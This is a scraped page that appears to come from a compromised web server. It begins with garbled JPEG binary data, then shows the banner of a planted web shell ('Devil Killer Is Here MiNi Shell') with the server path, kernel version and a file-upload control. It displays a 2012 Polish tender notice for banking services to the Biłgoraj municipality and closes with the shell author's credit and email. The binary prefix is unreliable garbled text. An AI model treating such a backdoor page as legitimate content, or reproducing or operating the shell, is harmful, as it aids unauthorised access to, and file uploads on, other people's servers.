JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/492574-N-2012.html

<p class="kh_header"><b>Biłgoraj: Bankowa obsługę budżetu Gminy Miasto Biłgoraj</b><br>
<b>Numer ogłoszenia: 492574 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Biłgoraj , Plac  Wolności 16, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6869600, faks 84 6869665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgoraj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankowa obsługę budżetu Gminy Miasto Biłgoraj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest prowadzenie bankowej obsługi budżetu Gminy Miasta Biłgoraj przez okres 4 lat od dnia podpisania umowy, obejmującej następujące jednostki organizacyjne:
a)	Urząd Miasta Biłgoraj
b)	Miejski Ośrodek Pomocy Społecznej 
c)	Ośrodek Sportu i Rekreacji
d)	Miejska Służba Drogowa 
e)	Biłgorajskie Centrum Kultury
f)	Miejska i Powiatowa Biblioteka Publiczna

2.	Wykaz rachunków bankowych w ramach poszczególnych jednostek:
a)	GMB - Urząd Miasta Biłgoraj: 
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych
-	rachunek pomocniczy - sumy depozytowe
-	rachunek pomocniczy PKZP
-	rachunek pomocniczy - inny
-	3 rachunki pomocnicze - projekty inwestycyjne
b)	GMB - Urząd Miasta Biłgoraj - Referat obsługi finansowej oświaty
-	9 rachunków podstawowych  - odrębnie dla każdej obsługiwanej jednostki,
-	10 rachunków pomocniczych - rachunki dochodów własnych,
-	9 rachunków pomocniczych - Zakładowy Fundusz Świadczeń Socjalnych.
c)	GMB - Miejski Ośrodek Pomocy Społecznej 
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych
-	rachunek pomocniczy - świadczenia rodzinne
-	rachunek pomocniczy - fundusz alimentacyjny i zaliczka alimentacyjna
-	rachunek pomocniczy - fundusze unijne
-	rachunek pomocniczy - fundusz antyalkoholowy
d)	GMB - Ośrodek Sportu i Rekreacji
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych
e)	GMB - Miejska Służba Drogowa
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych
f)	GMB - Biłgorajskie Centrum Kultury
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych
-	rachunek pomocniczy - inny,
g)	GMB - Miejska i Powiatowa Biblioteka Publiczna
-	rachunek podstawowy
-	rachunek pomocniczy - Zakładowy Fundusz Świadczeń Socjalnych.
3.	Bankowa obsługa budżetu Gminy Miasto Biłgoraj, w szczególności obejmować będzie następujące usługi: 
a)	otwarcie i prowadzenie rachunków bankowych, w ramach których będą dokonywane w szczególności:
-wpłaty i wypłaty gotówkowe,
-przelewy na rachunki w obrębie banku prowadzącego obsługę,
-przelewy na rachunki w innych bankach.
b)	udostępnienie możliwości lokowania wolnych środków (lokaty negocjowane, depozyty nocne). Szczegółowe zasady oraz warunki korzystania z tej usługi zostaną ustalone po zawarciu umowy na bankową obsługę budżetu.
c)	wszystkie rachunki bankowe będą nieoprocentowane,
d)	wypłaty gotówki będą dokonywane na podstawie czeków gotówkowych wydawanych przez bank. Dopuszcza się możliwość zastąpienia czeków gotówkowych innymi równoważnymi dokumentami używanymi przez oferenta, z zastrzeżeniem lit) i.
e)	udostępnianie wyciągów z rachunków bankowych, w wersji papierowej, po każdej zmianie salda,
f)	udostępnienie wielostanowiskowej usługi bankowości elektronicznej dla wymienionych wyżej jednostek obejmującej wszystkie rachunki bankowe umożliwiającej w szczególności dokonywanie przelewów, sprawdzanie sald rachunków oraz drukowanie duplikatów wyciągów bankowych zawierających szczegóły uznań i obciążeń rachunków,
g)	umożliwienie, w razie wystąpienia takiej konieczności, składania dyspozycji przelewów w formie papierowej,
h)	udzielenie kredytu obrotowego odnawialnego w rachunku podstawowym Urzędu Miasta Biłgoraj w kwocie 10 000 000 zł (dziesięć milionów zł),
i)	zapewnienie obsługi wypłat gotówkowych świadczeń (około 170 miesięcznie) dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w kasie banku (zamawiający nie dopuszcza możliwości wydawania dla tych osób kart płatniczych tzw. przedpłaconych). Zamawiający dopuszcza wypłaty (do wyboru przez wykonawcę) za pomocą czeków gotówkowych lub list wypłat sporządzanych przez Miejski Ośrodek Pomocy Społecznej. Generalnie wypłaty gotówkowe przypadają na 10 i 25 dzień każdego miesiąca. W przypadku wyboru sposobu dokonywania wypłat gotówkowych na podstawie list, niezależnie od tego, wykonawca zapewni Miejskiemu Ośrodkowi Pomocy Społecznej około 50 czeków gotówkowych w skali roku.
j)	udostępnienie usługi skrytki bankowej dla Urzędu Miasta Biłgoraj,
k)	możliwość skorzystania z usługi polegającej na nadaniu wszystkim kontrahentom Gminy Miasta Biłgoraj, w tym w szczególności podatnikom, indywidualnych numerów rachunków bankowych, na które winni wpłacać swoje zobowiązania,
l)	wydawanie zaświadczeń, w tym w szczególności o wysokości salda rachunku, obrotów, a także o ewentualnym jego zajęciu, na żądanie Zamawiającego,
3.	Za wszystkie usługi wymienione w ust.3, z wyjątkiem lit. h), oferent nie będzie pobierał żadnych opłat i/lub prowizji przez cały okres obowiązywania umowy.
4.	W przypadku gdy Zamawiający będzie chciał skorzystać z innych usług bankowych niż wymienione w ust.3, kwestie odpłatności za ich świadczenie będą podlegały odrębnym ustaleniom. 
5.	Zamawiający, w trakcie obowiązywania umowy, zastrzega sobie możliwość otwierania innych rachunków bankowych, poza wymienionymi w ust.2, na warunkach określonych w ust.4.
6.	Oferent jest zobowiązany posiadać na terenie Miasta Biłgoraj oddział, filię, punkt obsługi kasowej lub mieć zawartą umowę z innym podmiotem prowadzącym działalność bankową, na podstawie której ten podmiot będzie przyjmował i wypłacał gotówkę.
7.	Umowy na bankową obsługę budżetu Gminy Miasta Biłgoraj zostaną zawarte na okres 4 lat.
8.	Poglądowe dane o budżecie Gminy Miasto Biłgoraj, ilości rachunków bankowych, ilości dokonywanych przelewów, a także kwocie wpłat i wypłat gotówkowych przedstawione są w informacji nr 1 do SIWZ.

II Warunki udzielenia i korzystania z kredytu w podstawowym rachunku bieżącym Urzędu Miasta Biłgoraj

1.	Zamawiający będzie korzystał z kredytu obrotowego odnawialnego w kwocie 10 000 000 zł (dziesięć milionów zł) w podstawowym rachunku bieżącym Urzędu Miasta Biłgoraj.
2.	Okres kredytowania będzie równy okresowi obowiązywania umowy na bankową obsługę budżetu Gminy Miasto Biłgoraj i wynosi 4 lata.
3.	Umowy kredytowe zawierane będą na okres 1 roku. Przed podpisaniem umowy Zamawiający dostarczy Wykonawcy wszystkie niezbędne dokumenty zgodnie z właściwymi przepisami obowiązującymi w tym zakresie.
4.	Kredyt będzie udzielony i rozliczany w złotych polskich.
5.	Oprocentowanie kredytu oparte będzie na zmiennej stopie procentowej WIBOR 1M oraz stałej marży banku.
6.	Wykonawca przez cały okres kredytowania nie będzie pobierał żadnych dodatkowych prowizji, opłat itp. poza wskazanymi w złożonej ofercie. Marża banku będzie stała przez cały okres obowiązywania umowy.
7.	Wykonawca nie będzie pobierać opłat i prowizji bankowej od niewykorzystanej części kredytu.
8.	Zamawiający nie dopuszcza możliwości pobrania przez bank prowizji/opłaty za udzielenie kredytu (lub jakiejkolwiek innej prowizji/opłaty pobieranej przez bank w związku z zawieraną umową kredytową i/lub uruchomieniem kredytu). Oferta, w której przewidziana zostanie prowizja/opłata zostanie odrzucona.
9.	Kredyt w każdym roku obowiązywania umowy zostanie spłacony do dnia 31 grudnia.
10.	Spłata odsetek będzie następowała poprzez ich pobranie z rachunku (raz na miesiąc), w którym uruchomiony będzie kredyt.
11.	Zamawiający zastrzega sobie możliwość rezygnacji z części lub całości kredytu
12.	Prawne zabezpieczenie kredytu będzie stanowił weksel własny in blanco wystawiony przez zamawiającego wraz z deklaracja wekslową.
Przy ustalaniu wysokości oprocentowania należy:
-wykazać sposób obliczenia stawki oprocentowania przy zastosowaniu wyłącznie zmiennej stawki referencyjnej WIBOR 1M.
(Przykł. sposób określenia oprocentowania: WIBOR 1 M + (-)... % marży = .... % ).
-dla potrzeb złożenia oferty należy przyjąć stawkę referencyjną WIBOR 1M na dzień 12 grudnia 2012 r.
-nie jest dopuszczalne stosowanie przez oferenta stawki referencyjnej obliczanej jako średnia z jakiegokolwiek okresu (np. tygodniowego, miesięcznego).
-należy dokładnie określić stopę procentową do czterech miejsc po przecinku.
-dla potrzeb wyliczenia wysokości odsetek, w celu porównania ofert, należy przyjąć założenie, że począwszy od 1 stycznia 2013 r. do dnia 31 grudnia 2016 r., przez cały ten okres, kredyt będzie wykorzystany w wysokości 5 000 000 zł (pięć milionów złotych),
-przy obliczaniu wysokości odsetek należy przyjąć rzeczywistą liczbę dni w danym roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Wzór oświadczenia zał. Nr2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Wzór oświadczenia zał. Nr2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Wzór oświadczenia zał. Nr2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Wzór oświadczenia zał. Nr2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Wzór oświadczenia zał. Nr2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz cenowy zawierający koszty prowadzenia rachunków bankowych oraz koszty kredytu (należy wyodrębnić wszystkie składniki) - druk własny oferenta. 
2.Projekt umowy na prowadzenie rachunków bankowych oraz umowy kredytowej wraz z wekslem i deklaracją wekslową - druk własny oferenta. Umowa kredytowa winna zawierać w szczególności wskazanie dnia miesiąca, z którego stawka WIBOR 1M będzie przyjmowana do obliczania wysokości odsetek.
3.Dokument własny oferenta potwierdzający uprawnienia osób podpisujących ofertę do składania prawnie wiążących zobowiązań w imieniu banku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bilgoraj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miasto Biłgoraj Plac Wolności 16 23-400 Biłgoraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 09:00, miejsce: Gmina Miasto Biłgoraj Plac Wolności 16 23-400 Biłgoraj..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com